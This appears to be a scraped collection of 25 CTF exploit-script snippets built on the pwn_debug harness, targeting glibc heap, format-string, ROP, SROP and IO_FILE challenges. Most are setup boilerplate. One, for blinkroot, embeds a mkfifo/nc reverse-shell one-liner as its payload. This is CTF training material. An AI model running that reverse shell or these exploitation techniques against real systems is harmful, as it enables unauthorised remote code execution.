예제 #1
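def run_exp(ip, port, remote):
    """Build the pwn_debug harness for ./babycpp and retry pwn() until it returns a flag.

    Args:
        ip, port: endpoint registered with pdbg.remote(); used when `remote` is true.
        remote: truthy -> start the "remote" target; falsy -> start a "local"
            target and also publish pdbg.membp.

    Returns:
        The first truthy value returned by pwn(remote); the loop does not end
        otherwise.

    Side effects: (re)binds the module globals pdbg, p, membp, elf and libc,
    which the rest of the script reads.
    """
    global pdbg, p, membp, elf, libc
    pdbg = pwn_debug("./babycpp")
    pdbg.context.terminal = ['tmux', 'splitw', '-h']
    pdbg.local()
    pdbg.debug("2.27")
    pdbg.remote(ip, port)

    # The original always ran "local" even though `remote` decides whether
    # membp is read and is handed to pwn(); derive the target from the flag,
    # as the other run_exp() variants in this collection do.
    target = "remote" if remote else "local"
    while True:
        p = None
        try:
            p = pdbg.run(target)
            elf = pdbg.elf
            libc = pdbg.libc
            if not remote:
                membp = pdbg.membp
            flag = pwn(remote)
            if flag:
                print(flag)
                return flag
        except Exception as e:
            print(str(e))
        # Retry: release the process of the failed attempt first, but only if
        # pdbg.run() got far enough to create one. The original called
        # p.close() unconditionally, which raises NameError when run() itself
        # failed on the first iteration, and never closed p when pwn()
        # returned a falsy value.
        if p is not None:
            p.close()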
예제 #2
def run_exp(ip,port,remote):
    """Build the pwn_debug harness for ./one, start the target and hand off to pwn().

    Args:
        ip, port: endpoint registered with pdbg.remote(); only used when
            `remote` is true.
        remote: truthy -> start the "remote" target; falsy -> start the "debug"
            target and also publish pdbg.membp.

    Returns:
        Whatever pwn(remote) returns.

    Side effects: (re)binds the module globals pdbg, p, membp, elf and libc.
    """
    global pdbg, p, membp, elf, libc

    pdbg = pwn_debug("./one")
    pdbg.context.terminal = ['tmux', 'splitw', '-h']
    pdbg.local()
    pdbg.debug("2.27")
    pdbg.remote(ip, port)

    # Any falsy `remote` means the debug target, exactly as the if/else did.
    target = "remote" if remote else "debug"
    p = pdbg.run(target)
    if not remote:
        membp = pdbg.membp

    elf = pdbg.elf
    libc = pdbg.libc

    return pwn(remote)
예제 #3
def run_exp(ip, port, remote):
    """Build the pwn_debug harness for ./trywrite, start the target and run pwn().

    Args:
        ip, port: endpoint registered with pdbg.remote(); only used when
            `remote` is true.
        remote: truthy -> start the "remote" target; falsy -> start the "local"
            target and also publish pdbg.membp.

    Returns:
        Whatever pwn(remote) returns.

    Side effects: (re)binds the module globals pdbg, p, membp, elf and libc.
    """
    global pdbg, p, membp, elf, libc

    pdbg = pwn_debug("./trywrite")
    pdbg.context.terminal = ['tmux', 'splitw', '-h']
    #pdbg.context.log_level="debug"
    pdbg.local("./libc-2.27.so")
    pdbg.debug("2.27")
    pdbg.remote(ip, port)

    if remote:
        p = pdbg.run("remote")
    else:
        # membp is only read for the local run.
        p = pdbg.run("local")
        membp = pdbg.membp

    elf = pdbg.elf
    libc = pdbg.libc

    return pwn(remote)
예제 #4
def run_exp(ip, port, remote):
    """Build the pwn_debug harness for ./random, start the target and run pwn().

    Args:
        ip, port: endpoint registered with pdbg.remote() together with the
            bundled libc-2.23; only used when `remote` is true.
        remote: truthy -> start the "remote" target; falsy -> start the "local"
            target and also publish pdbg.membp.

    Returns:
        Whatever pwn(remote) returns.

    Side effects: (re)binds the module globals pdbg, p, membp, elf and libc.
    """
    global pdbg, p, membp, elf, libc

    pdbg = pwn_debug("./random")
    pdbg.context.terminal = ['tmux', 'splitw', '-h']
    #pdbg.context.log_level='debug'
    pdbg.local("./libc-2.23.so", "/glibc/x64/2.23/lib/ld-2.23.so")
    pdbg.debug("2.23")
    pdbg.remote(ip, port, "./libc-2.23.so")

    # Truthiness of `remote` picks the target, same as the original if/else.
    run_mode = {True: "remote", False: "local"}[bool(remote)]
    p = pdbg.run(run_mode)
    if not remote:
        membp = pdbg.membp

    elf = pdbg.elf
    libc = pdbg.libc

    return pwn(remote)
예제 #5
파일: exp.py 프로젝트: ray-cp/pwn_category
# File: exp.py
# Author: raycp
# Date: 2019-06-10
# Description: exp for neighbor_c, bruteforce to guess stack addr and stdout addr by 4bytes, and change stderr.fileno to 1, which then can leak address. Then write one gadget to malloc_hook, at last trigger malloc

from pwn_debug import *

# Harness for the target binary; pwn_debug comes from the star import above.
pdbg = pwn_debug("./neighbor_c")

# Terminal command the harness uses for any window it opens: a horizontal tmux split.
pdbg.context.terminal = ['tmux', 'splitw', '-h']

# Run-mode registration. Only the "debug" mode is configured and started here;
# "2.27" is presumably the glibc version it should use -- confirm against pwn_debug.
#pdbg.local()
pdbg.debug("2.27")
#pdbg.remote('127.0.0.1', 22)
#p=pdbg.run("local")
#p=pdbg.run("remote")
p = pdbg.run("debug")  # tube to the started target; the helpers below read this global

# Harness views of the running process: membp carries elf_base/libc_base (see the
# commented print); elf/libc are presumably pwntools-style ELF objects -- verify.
membp = pdbg.membp
#print hex(membp.elf_base),hex(membp.libc_base)
elf = pdbg.elf
libc = pdbg.libc

#io_file=IO_FILE_plus()
#io_file.show()


def format_one(payload):
    """Send `payload` as one line to the target through the global tube `p`."""
    tube = p
    tube.sendline(payload)

예제 #6
파일: exp.py 프로젝트: now4yreal/ctf
from pwn_debug import *

# Harness for the target binary; pwn_debug comes from the star import above.
pdbg = pwn_debug("./anti")
pdbg.context.terminal = ['tmux', 'splitw', '-h']  # tmux horizontal split for harness windows
# `context` is not defined in this snippet; presumably pwntools' context
# re-exported by the star import -- verify.
context.log_level = 'debug'
# Register all three run modes; the strings look like a libc path / glibc
# version / endpoint plus libc, but their exact meaning is pwn_debug's -- confirm.
pdbg.local("")
pdbg.debug("2.23")
pdbg.remote('172.1.2.15', 9999, "./libc-2.23.so")

# Manual mode selector. Note there is no else branch: any value other than
# 1/2/3 leaves `p` unbound and the helpers below fail with NameError.
switch = 1
if switch == 1:
    p = pdbg.run("local")
elif switch == 2:
    p = pdbg.run("debug")
elif switch == 3:
    p = pdbg.run("remote")
#-----------------------------------------------------------------------------------------
# Thin wrappers over the global tube `p` and harness `pdbg` defined above. Every
# payload goes through str() so that ints can be passed directly.
def s(data):
    """Send `data` with no trailing newline."""
    return p.send(str(data))


def sa(delim, data):
    """Wait for `delim`, then send `data`."""
    return p.sendafter(str(delim), str(data))


def sl(data):
    """Send `data` followed by a newline."""
    return p.sendline(str(data))


def sla(delim, data):
    """Wait for `delim`, then send `data` followed by a newline."""
    return p.sendlineafter(str(delim), str(data))


def r(numb=4096):
    """Receive up to `numb` bytes."""
    return p.recv(numb)


def ru(delims, drop=True):
    """Receive up to `delims`; `drop` is forwarded to recvuntil."""
    return p.recvuntil(delims, drop)


def it():
    """Hand the tube over to the user."""
    return p.interactive()


def uu32(data):
    """Right-pad `data` with NULs to 4 bytes and unpack it with u32()."""
    return u32(data.ljust(4, '\0'))


def uu64(data):
    """Right-pad `data` with NULs to 8 bytes and unpack it with u64()."""
    return u64(data.ljust(8, '\0'))


def bp(bkp):
    """Forward breakpoint spec `bkp` to the harness."""
    return pdbg.bp(bkp)


def sym(symbol):
    """Resolve `symbol` through the harness."""
    return pdbg.sym(symbol)


def bpp():
예제 #7
# File: IO_FILE_str_finish_vtable_bypass.py
# Author: raycp
# Date: 2019-06-01
# Description: template for bypass vtable check with str_jumps vtable

from pwn_debug import *


# Harness for the target binary; pwn_debug comes from the star import above.
pdbg=pwn_debug("./binary")

# Terminal command the harness uses for any window it opens: a horizontal tmux split.
pdbg.context.terminal=['tmux', 'splitw', '-h']

# Run-mode registration. Only the "debug" mode is configured and started here;
# "2.23" is presumably the glibc version it should use -- confirm against pwn_debug.
#pdbg.local()
pdbg.debug("2.23")
#pdbg.remote('127.0.0.1', 22)
#p=pdbg.run("local")
#p=pdbg.run("remote")
p=pdbg.run("debug")  # tube to the started target; read by the functions below
# Harness views of the running process: membp carries elf_base/libc_base (see the
# commented print); elf/libc are presumably pwntools-style ELF objects -- verify.
membp=pdbg.membp
#print hex(membp.elf_base),hex(membp.libc_base)
elf=pdbg.elf
libc=pdbg.libc


def pwn():

	#pdbg.bp([])

    libc_base=0x0

    io_list_all=libc_base+libc.symbols['_IO_list_all']
예제 #8
파일: exp.py 프로젝트: ray-cp/pwn_category
# File: exp.py
# Author: raycp
# Date: 2019-06-02
# Description: exp for syscall_interface

from pwn_debug import *

# Harness for the target binary; pwn_debug comes from the star import above.
pdbg = pwn_debug("./syscall_interface")

# Terminal command the harness uses for any window it opens: a horizontal tmux split.
pdbg.context.terminal = ['tmux', 'splitw', '-h']
#context.log_level="debug"
# Run-mode registration. Only the "debug" mode is configured and started here;
# "2.23" is presumably the glibc version it should use -- confirm against pwn_debug.
#pdbg.local()
pdbg.debug("2.23")
#pdbg.remote('127.0.0.1', 22)
#p=pdbg.run("local")
#p=pdbg.run("remote")
p = pdbg.run("debug")  # tube to the started target; read by the functions below

# Harness views of the running process: membp carries elf_base/libc_base (see the
# commented print); elf/libc are presumably pwntools-style ELF objects -- verify.
membp = pdbg.membp
#print hex(membp.elf_base),hex(membp.libc_base)
elf = pdbg.elf
libc = pdbg.libc


#io_file=IO_FILE_plus()
#io_file.show()
def syscall(syscall_number, arg):
    p.recvuntil("choice:")
    p.sendline("0")
    p.recvuntil("number:")
    p.sendline(str(syscall_number))
예제 #9
파일: exp.py 프로젝트: now4yreal/ctf
from pwn_debug import *


# Harness for the target binary; pwn_debug comes from the star import above.
pdbg=pwn_debug("./babygame")
pdbg.context.terminal=['tmux', 'splitw', '-h']  # tmux horizontal split for harness windows
# `context` is not defined in this snippet; presumably pwntools' context
# re-exported by the star import -- verify.
context.log_level='debug'
# Register all three run modes. remote() is called with no endpoint here, so
# the "remote" mode (switch==3) presumably cannot connect as written -- confirm.
pdbg.local("")
pdbg.debug("2.23")
pdbg.remote()

# Manual mode selector. There is no else branch: any value other than 1/2/3
# leaves `p` unbound and the helpers below fail with NameError.
switch=1
if switch==1:
    p=pdbg.run("local")
elif switch==2:
    p=pdbg.run("debug")
elif switch==3:
    p=pdbg.run("remote")
#-----------------------------------------------------------------------------------------
# Thin wrappers over the global tube `p` and harness `pdbg` defined above. Every
# payload goes through str() so that ints can be passed directly.
def s(data):
    """Send `data` with no trailing newline."""
    return p.send(str(data))


def sa(delim, data):
    """Wait for `delim`, then send `data`."""
    return p.sendafter(str(delim), str(data))


def sl(data):
    """Send `data` followed by a newline."""
    return p.sendline(str(data))


def sla(delim, data):
    """Wait for `delim`, then send `data` followed by a newline."""
    return p.sendlineafter(str(delim), str(data))


def r(numb=4096):
    """Receive up to `numb` bytes."""
    return p.recv(numb)


def ru(delims, drop=True):
    """Receive up to `delims`; `drop` is forwarded to recvuntil."""
    return p.recvuntil(delims, drop)


def it():
    """Hand the tube over to the user."""
    return p.interactive()


def uu32(data):
    """Right-pad `data` with NULs to 4 bytes and unpack it with u32()."""
    return u32(data.ljust(4, '\0'))


def uu64(data):
    """Right-pad `data` with NULs to 8 bytes and unpack it with u64()."""
    return u64(data.ljust(8, '\0'))


def bp(bkp):
    """Forward breakpoint spec `bkp` to the harness."""
    return pdbg.bp(bkp)


def sym(symbol):
    """Resolve `symbol` through the harness."""
    return pdbg.sym(symbol)
def bpp():
    """Call the harness breakpoint hook with an empty list (the `bp` helper inlined)."""
    pdbg.bp([])
예제 #10
# File: exp.py
# Author: raycp
# Date: 2019-06-09
# Description: exp for HeapsOfPrint, form a loop by format vuln and write by rbp

from pwn_debug import *

# Harness for the target binary; pwn_debug comes from the star import above.
pdbg = pwn_debug("./HeapsOfPrint")

# Terminal command the harness uses for any window it opens: a horizontal tmux split.
pdbg.context.terminal = ['tmux', 'splitw', '-h']

# Run-mode registration. Only the "debug" mode is configured and started here;
# "2.27" is presumably the glibc version it should use -- confirm against pwn_debug.
#pdbg.local()
pdbg.debug("2.27")
#pdbg.remote('127.0.0.1', 22)
#p=pdbg.run("local")
#p=pdbg.run("remote")
p = pdbg.run("debug")  # tube to the started target; the helpers below read this global

# Harness views of the running process: membp carries elf_base/libc_base (see the
# commented print); elf/libc are presumably pwntools-style ELF objects -- verify.
membp = pdbg.membp
#print hex(membp.elf_base),hex(membp.libc_base)
elf = pdbg.elf
libc = pdbg.libc

#io_file=IO_FILE_plus()
#io_file.show()


def format_one(payload):
    """Send `payload` as one line to the target through the global tube `p`."""
    tube = p
    tube.sendline(payload)

예제 #11
from pwn_debug import *

## step 1
# Harness for the target binary; pwn_debug comes from the star import above.
pdbg = pwn_debug("test-fopen")

# Terminal command the harness uses for any window it opens: a horizontal tmux split.
pdbg.context.terminal = ['tmux', 'splitw', '-h']

## step 2
# Register the "local" (with a libc path) and "debug" modes; "2.23" is presumably
# the glibc version for the debug mode -- confirm against pwn_debug.
pdbg.local("libc.so.6")
pdbg.debug("2.23")
#pdbg.remote('34.92.96.238',10000)
## step 3

#p=pdbg.run("debug")
#p=pdbg.run("remote")

# pause()
# Breakpoint registered before the process exists; presumably applied by run() -- verify.
pdbg.bp([0x400450])

p = pdbg.run("local")  # tube to the started target
p.interactive()  # hand the tube over to the user; nothing runs after this
예제 #12
파일: exp.py 프로젝트: ray-cp/pwn_category
# File: exp.py
# Author: raycp
# Date: 2019-05-31
# Description: exp for blinkroot

from pwn_debug import *

# Harness for the target binary; pwn_debug comes from the star import above.
pdbg = pwn_debug("./blinkroot")

# Terminal command the harness uses for any window it opens: a horizontal tmux split.
pdbg.context.terminal = ['tmux', 'splitw', '-h']

# Run-mode registration. Only the "debug" mode is configured and started here;
# "2.23" is presumably the glibc version it should use -- confirm against pwn_debug.
#pdbg.local()
pdbg.debug("2.23")
#pdbg.remote('127.0.0.1', 22)
#p=pdbg.run("local")
#p=pdbg.run("remote")
p = pdbg.run("debug")  # tube to the started target; read by the functions below
# ELF/libc objects exposed by the harness; presumably pwntools-style -- verify.
# (Unlike the sibling scripts, membp is not read here.)
elf = pdbg.elf
libc = pdbg.libc


def pwn():

    addr = 0x600BC0
    plt0 = 0x600B40
    payload = p64(0x10000000000000000 - (addr - plt0))
    payload += p64(addr + 0x100)
    payload += "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 127.0.0.1 4444 >/tmp/f"

    payload = payload.ljust(0x100, '\x00')
예제 #13
파일: exp.py 프로젝트: ray-cp/pwn_category
# File: exp.py
# Author: raycp
# Date: 2019-06-02
# Description: exp for gundam

from pwn_debug import *


# Harness for the target binary; pwn_debug comes from the star import above.
pdbg=pwn_debug("./gundam")

# Terminal command the harness uses for any window it opens: a horizontal tmux split.
pdbg.context.terminal=['tmux', 'splitw', '-h']

# Run-mode registration: "local" and "debug" are configured, only "debug" is
# started. "2.27" is presumably the glibc version -- confirm against pwn_debug.
pdbg.local()
pdbg.debug("2.27")
#pdbg.remote('127.0.0.1', 22)
#p=pdbg.run("local")
#p=pdbg.run("remote")
p=pdbg.run("debug")  # tube to the started target; read by the functions below

# Harness views of the running process: membp carries elf_base/libc_base (see the
# commented print); elf/libc are presumably pwntools-style ELF objects -- verify.
membp=pdbg.membp
#print hex(membp.elf_base),hex(membp.libc_base)
elf=pdbg.elf
libc=pdbg.libc

#io_file=IO_FILE_plus()
#io_file.show()

def add(name,typ):
    p.recvuntil("choice : ")
    p.sendline("1")
    p.recvuntil("gundam :")
예제 #14
파일: exp.py 프로젝트: ray-cp/pwn_category
# File: exp.py
# Author: raycp
# Date: 2019-06-03
# Description: exp for baby_tcache, unlink to form overlap chunk by off-by-null vuln,bruteforce to overwrite stdout to leak

from pwn_debug import *

# Harness for the target binary; pwn_debug comes from the star import above.
pdbg = pwn_debug("./baby_tcache")

# Terminal command the harness uses for any window it opens: a horizontal tmux split.
pdbg.context.terminal = ['tmux', 'splitw', '-h']

# Run-mode registration: "local" takes an explicit libc and loader path, "debug"
# presumably a glibc version -- confirm against pwn_debug. Only "local" is started.
pdbg.local("./libc-2.27.so", "/glibc/x64/2.27/lib/ld-2.27.so")
pdbg.debug("2.27")
#pdbg.remote('127.0.0.1', 22)
p = pdbg.run("local")  # tube to the started target; read by the functions below
#p=pdbg.run("remote")
#p=pdbg.run("debug")

# Harness views of the running process: membp carries elf_base/libc_base (see the
# commented print); elf/libc are presumably pwntools-style ELF objects -- verify.
membp = pdbg.membp
#print hex(membp.elf_base),hex(membp.libc_base)
elf = pdbg.elf
libc = pdbg.libc

#io_file=IO_FILE_plus()
#io_file.show()


def new(size, content):
    p.recvuntil("choice: ")
    p.sendline("1")
    p.recvuntil("Size:")
예제 #15
from pwn_debug import *
import time

# Harness for the target binary; pwn_debug comes from the star import above.
pdbg = pwn_debug("printf_test")
pdbg.context.terminal = ['tmux', 'splitw', '-h']  # tmux horizontal split for harness windows
# `context` is not defined in this snippet; presumably pwntools' context
# re-exported by the star import -- verify.
context.log_level = 'debug'
# Only "local" and "remote" are registered; no pdbg.debug(...) call is made, so
# switch==2 below presumably starts an unconfigured mode -- confirm. remote() is
# also called without an endpoint.
pdbg.local("")
pdbg.remote()

# Manual mode selector. There is no else branch: any value other than 1/2/3
# leaves `p` unbound and the helpers below fail with NameError.
switch = 1
if switch == 1:
    p = pdbg.run("local")
elif switch == 2:
    p = pdbg.run("debug")
elif switch == 3:
    p = pdbg.run("remote")
#-----------------------------------------------------------------------------------------
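# Thin wrappers over the global tube `p` and harness `pdbg` defined above. Every
# payload goes through str() so that ints can be passed directly.
s = lambda data: p.send(str(data))  #in case that data is an int
sa = lambda delim, data: p.sendafter(str(delim), str(data))
sl = lambda data: p.sendline(str(data))
sla = lambda delim, data: p.sendlineafter(str(delim), str(data))
r = lambda numb=4096: p.recv(numb)
ru = lambda delims, drop=True: p.recvuntil(delims, drop)
it = lambda: p.interactive()
# Pad to the word size and unpack. str.ljust() requires a fill character of
# length exactly 1; the original passed '' here, which raises TypeError on
# every call. '\x00' matches the uu32/uu64 helpers elsewhere in this collection.
uu32 = lambda data: u32(data.ljust(4, '\x00'))
uu64 = lambda data: u64(data.ljust(8, '\x00'))
bp = lambda bkp: pdbg.bp(bkp)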


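def bpp(m=None):
    """Forward breakpoint list `m` (default: no breakpoints) to the `bp` helper.

    `m` defaults to None instead of a shared `[]` so that a mutation of the
    list by a caller or by pdbg.bp() cannot leak into later calls.
    """
    bp([] if m is None else m)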
예제 #16
파일: exp.py 프로젝트: ray-cp/pwn_category
# File: exp.py
# Author: raycp
# Date: 2019-05-21
# Description: exp for babyprintf_ver2

from pwn_debug import *

# Harness for the target binary; pwn_debug comes from the star import above.
pdbg = pwn_debug("babyprintf_ver2")

# Terminal command the harness uses for any window it opens: a horizontal tmux split.
pdbg.context.terminal = ['tmux', 'splitw', '-h']
#pdbg.context.log_level="debug"
# Register all three run modes: "local" with explicit libc and loader paths,
# "debug" with what is presumably a glibc version, "remote" with an endpoint.
# Only "debug" is started.
pdbg.local("./libc64.so", "/glibc/x64/2.27/lib/ld-2.27.so")
pdbg.debug("2.24")
pdbg.remote('127.0.0.1', 22)
#p=pdbg.run("local")
#p=pdbg.run("remote")
p = pdbg.run("debug")  # tube to the started target; read by the functions below
# Base addresses reported by the harness (elf_base/libc_base are read right below).
membp = pdbg.membp
#print type(pdbg.membp)
#print pdbg.hh
# Python 2 print statement (SyntaxError under Python 3).
print hex(membp.elf_base), hex(membp.libc_base)
# ELF/libc objects exposed by the harness; presumably pwntools-style -- verify.
elf = pdbg.elf
libc = pdbg.libc


#a=IO_FILE_plus()
#print a
#a.show()
#print a._IO_read_base
def do_one(data):
    """Write `data` to the target through the global tube `p`, without a newline."""
    tube = p
    tube.send(data)
예제 #17
# File: exp.py
# Author: raycp
# Date: 2019-05-28
# Description: exp for 2ez4u

from pwn_debug import *

# Harness for the target binary; pwn_debug comes from the star import above.
pdbg=pwn_debug("./2ez4u")

# Terminal command the harness uses for any window it opens: a horizontal tmux split.
pdbg.context.terminal=['tmux', 'splitw', '-h']

# Register all three run modes: "local" with explicit libc and loader paths,
# "debug" with what is presumably a glibc version, "remote" with an endpoint.
# Only "debug" is started.
pdbg.local("./libc.so","/glibc/x64/2.24/lib/ld-2.24.so")
pdbg.debug("2.24")
pdbg.remote('127.0.0.1', 22)
#p=pdbg.run("local")
#p=pdbg.run("remote")
p=pdbg.run("debug")  # tube to the started target; read by the functions below
# Base addresses reported by the harness (elf_base/libc_base per the commented print).
membp=pdbg.membp
#print type(pdbg.membp)
#print pdbg.hh
#print hex(membp.elf_base),hex(membp.libc_base)
#elf=pdbg.elf
# Only the libc object is kept in this script (elf is left commented out above).
libc=pdbg.libc
#a=IO_FILE_plus()
#print a
#a.show()
#print a._IO_read_basei

def add(size,desc,color='0',value='0',num='0'):
    p.recvuntil("hoice: ")
    p.sendline("1")
예제 #18
파일: exp.py 프로젝트: ray-cp/pwn_category
# File: exp.py
# Author: raycp
# Date: 2019-05-31
# Description: exp for babystack

from pwn_debug import *

# Harness for the target binary; pwn_debug comes from the star import above.
pdbg = pwn_debug("./babystack")

# Terminal command the harness uses for any window it opens: a horizontal tmux split.
pdbg.context.terminal = ['tmux', 'splitw', '-h']

# Run-mode registration. Only the "debug" mode is configured and started here;
# "2.23" is presumably the glibc version it should use -- confirm against pwn_debug.
#pdbg.local()
pdbg.debug("2.23")
#pdbg.remote('127.0.0.1', 22)
#p=pdbg.run("local")
#p=pdbg.run("remote")
p = pdbg.run("debug")  # tube to the started target; read by the functions below
# Harness views of the running process: membp carries elf_base/libc_base (see the
# commented print); elf/libc are presumably pwntools-style ELF objects -- verify.
membp = pdbg.membp
#print hex(membp.elf_base),hex(membp.libc_base)
elf = pdbg.elf
libc = pdbg.libc
#a=IO_FILE_plus()
#print a
#a.show()


def pwn():

    p3_ret = 0x080484e9  #: pop esi ; pop edi ; pop ebp ; ret
    pebp_ret = 0x080484eb  #: pop ebp ; ret
    leave_ret = 0x080483a8  # : leave ; ret
예제 #19
# File: exp.py
# Author: raycp
# Date: 2019-06-06
# Description: exp for house of atum, tcache and fastbin chain to form the 0x10 byte backwards

from pwn_debug import *

# Harness for the target binary; pwn_debug comes from the star import above.
pdbg = pwn_debug("./houseofAtum")

# Terminal command the harness uses for any window it opens: a horizontal tmux split.
pdbg.context.terminal = ['tmux', 'splitw', '-h']

# Run-mode registration. Only the "debug" mode is configured and started here;
# "2.27" is presumably the glibc version it should use -- confirm against pwn_debug.
#pdbg.local()
pdbg.debug("2.27")
#pdbg.remote('127.0.0.1', 22)
#p=pdbg.run("local")
#p=pdbg.run("remote")
p = pdbg.run("debug")  # tube to the started target; read by the functions below

# Harness views of the running process: membp carries elf_base/libc_base (see the
# commented print); elf/libc are presumably pwntools-style ELF objects -- verify.
membp = pdbg.membp
#print hex(membp.elf_base),hex(membp.libc_base)
elf = pdbg.elf
libc = pdbg.libc

#io_file=IO_FILE_plus()
#io_file.show()


def add(content):
    p.recvuntil("choice:")
    p.sendline("1")
    p.recvuntil("ontent:")
예제 #20
# File: exp.py
# Author: raycp
# Date: 2019-06-03
# Description: exp for god-the-reum,uaf in withdraw function

from pwn_debug import *

# Harness for the target binary; pwn_debug comes from the star import above.
pdbg = pwn_debug("./god-the-reum")

# Terminal command the harness uses for any window it opens: a horizontal tmux split.
pdbg.context.terminal = ['tmux', 'splitw', '-h']

# Run-mode registration: "local" takes an explicit libc and loader path, "debug"
# presumably a glibc version -- confirm against pwn_debug. Only "local" is started.
pdbg.local("./libc-2.27.so", "/glibc/x64/2.27/lib/ld-2.27.so")
pdbg.debug("2.27")
#pdbg.remote('127.0.0.1', 22)
p = pdbg.run("local")  # tube to the started target; read by the functions below
#p=pdbg.run("remote")
#p=pdbg.run("debug")

# Harness views of the running process: membp carries elf_base/libc_base (see the
# commented print); elf/libc are presumably pwntools-style ELF objects -- verify.
membp = pdbg.membp
#print hex(membp.elf_base),hex(membp.libc_base)
elf = pdbg.elf
libc = pdbg.libc

#io_file=IO_FILE_plus()
#io_file.show()


def create(eth):
    p.recvuntil("choice : ")
    p.sendline("1")
    p.recvuntil("eth? : ")
예제 #21
# File: exp.py
# Author: raycp
# Date: 2019-06-02
# Description: template for srop

from pwn_debug import *

# Harness for the target binary; pwn_debug comes from the star import above.
pdbg = pwn_debug("./smallest")

# Terminal command the harness uses for any window it opens: a horizontal tmux split.
pdbg.context.terminal = ['tmux', 'splitw', '-h']

# Run-mode registration. Only the "debug" mode is configured and started here;
# "2.23" is presumably the glibc version it should use -- confirm against pwn_debug.
#pdbg.local()
pdbg.debug("2.23")
#pdbg.remote('127.0.0.1', 22)
#p=pdbg.run("local")
#p=pdbg.run("remote")
p = pdbg.run("debug")  # tube to the started target; read by the functions below

# Harness views of the running process: membp carries elf_base/libc_base (see the
# commented print); elf/libc are presumably pwntools-style ELF objects -- verify.
membp = pdbg.membp
#print hex(membp.elf_base),hex(membp.libc_base)
elf = pdbg.elf
libc = pdbg.libc

#io_file=IO_FILE_plus()
#io_file.show()


def pwn():

    ## sigreturn syscall number is 15 in x64, 119 in x86
    frame = SigreturnFrame()
예제 #22
from pwn_debug import *

# Harness for the target binary; pwn_debug comes from the star import above.
pdbg = pwn_debug("./pwn")
pdbg.context.terminal = ['tmux', 'splitw', '-h']  # tmux horizontal split for harness windows
# `context` is not defined in this snippet; presumably pwntools' context
# re-exported by the star import -- verify.
context.log_level = 'debug'
# Only "local" and "remote" are registered; no pdbg.debug(...) call is made, so
# switch==2 below presumably starts an unconfigured mode -- confirm. remote() is
# also called without an endpoint.
pdbg.local("")

pdbg.remote()

# Manual mode selector. There is no else branch: any value other than 1/2/3
# leaves `p` unbound and the helpers below fail with NameError.
switch = 1
if switch == 1:
    p = pdbg.run("local")
elif switch == 2:
    p = pdbg.run("debug")
elif switch == 3:
    p = pdbg.run("remote")
#-----------------------------------------------------------------------------------------
# Thin wrappers over the global tube `p` and harness `pdbg` defined above. Every
# payload goes through str() so that ints can be passed directly.
def s(data):
    """Send `data` with no trailing newline."""
    return p.send(str(data))


def sa(delim, data):
    """Wait for `delim`, then send `data`."""
    return p.sendafter(str(delim), str(data))


def sl(data):
    """Send `data` followed by a newline."""
    return p.sendline(str(data))


def sla(delim, data):
    """Wait for `delim`, then send `data` followed by a newline."""
    return p.sendlineafter(str(delim), str(data))


def r(numb=4096):
    """Receive up to `numb` bytes."""
    return p.recv(numb)


def ru(delims, drop=True):
    """Receive up to `delims`; `drop` is forwarded to recvuntil."""
    return p.recvuntil(delims, drop)


def it():
    """Hand the tube over to the user."""
    return p.interactive()


def uu32(data):
    """Right-pad `data` with NULs to 4 bytes and unpack it with u32()."""
    return u32(data.ljust(4, '\0'))


def uu64(data):
    """Right-pad `data` with NULs to 8 bytes and unpack it with u64()."""
    return u64(data.ljust(8, '\0'))


def bp(bkp):
    """Forward breakpoint spec `bkp` to the harness."""
    return pdbg.bp(bkp)


def bpp():
    """Call the harness breakpoint hook with an empty list (the `bp` helper inlined)."""
    pdbg.bp([])
예제 #23
파일: exp.py 프로젝트: ray-cp/pwn_category
# File: exp.py
# Author: raycp
# Date: 2019-06-03
# Description: exp for children_tcache,unlink to form overlap chunk by off-by-null vuln


from pwn_debug import *


# Harness for the target binary; pwn_debug comes from the star import above.
pdbg=pwn_debug("./children_tcache")

# Terminal command the harness uses for any window it opens: a horizontal tmux split.
pdbg.context.terminal=['tmux', 'splitw', '-h']

# Run-mode registration: "local" takes an explicit libc and loader path, "debug"
# presumably a glibc version -- confirm against pwn_debug. Only "local" is started.
pdbg.local("./libc-2.27.so","/glibc/x64/2.27/lib/ld-2.27.so")
pdbg.debug("2.27")
#pdbg.remote('127.0.0.1', 22)
p=pdbg.run("local")  # tube to the started target; read by the functions below
#p=pdbg.run("remote")
#p=pdbg.run("debug")

# Harness views of the running process: membp carries elf_base/libc_base (see the
# commented print); elf/libc are presumably pwntools-style ELF objects -- verify.
membp=pdbg.membp
#print hex(membp.elf_base),hex(membp.libc_base)
elf=pdbg.elf
libc=pdbg.libc

#io_file=IO_FILE_plus()
#io_file.show()

def new(size,content):
    p.recvuntil("choice: ")
    p.sendline("1")
예제 #24
# File: exp.py
# Author: raycp
# Date: 2019-06-06
# Description: exp for three, uaf to brute force to overwrite stdout to leak libc

from pwn_debug import *


# Harness for the target binary; pwn_debug comes from the star import above.
pdbg=pwn_debug("./three")

# Terminal command the harness uses for any window it opens: a horizontal tmux split.
pdbg.context.terminal=['tmux', 'splitw', '-h']

# Run-mode registration. Only the "debug" mode is configured and started here;
# "2.27" is presumably the glibc version it should use -- confirm against pwn_debug.
#pdbg.local()
pdbg.debug("2.27")
#pdbg.remote('127.0.0.1', 22)
#p=pdbg.run("local")
#p=pdbg.run("remote")
p=pdbg.run("debug")  # tube to the started target; read by the functions below

# Harness views of the running process: membp carries elf_base/libc_base (see the
# commented print); elf/libc are presumably pwntools-style ELF objects -- verify.
membp=pdbg.membp
#print hex(membp.elf_base),hex(membp.libc_base)
elf=pdbg.elf
libc=pdbg.libc

#io_file=IO_FILE_plus()
#io_file.show()


def add(content):
    p.recvuntil("choice:")
    p.sendline("1")
예제 #25
# File: exp.py
# Author: raycp
# Date: 2019-05-29
# Description: exp for heapstorm2

from pwn_debug import *

# Harness for the target binary; pwn_debug comes from the star import above.
pdbg = pwn_debug("./heapstorm2")

# Terminal command the harness uses for any window it opens: a horizontal tmux split.
pdbg.context.terminal = ['tmux', 'splitw', '-h']

# Register all three run modes ("local" with an empty libc path, "debug" with
# what is presumably a glibc version, "remote" with an endpoint); only "debug"
# is started -- confirm argument meaning against pwn_debug.
pdbg.local("")
pdbg.debug("2.23")
pdbg.remote('127.0.0.1', 22)
#p=pdbg.run("local")
#p=pdbg.run("remote")
p = pdbg.run("debug")  # tube to the started target; read by the functions below
# Harness views of the running process: membp carries elf_base/libc_base (see the
# commented print); elf/libc are presumably pwntools-style ELF objects -- verify.
membp = pdbg.membp
#print type(pdbg.membp)
#print pdbg.hh
#print hex(membp.elf_base),hex(membp.libc_base)
elf = pdbg.elf
libc = pdbg.libc
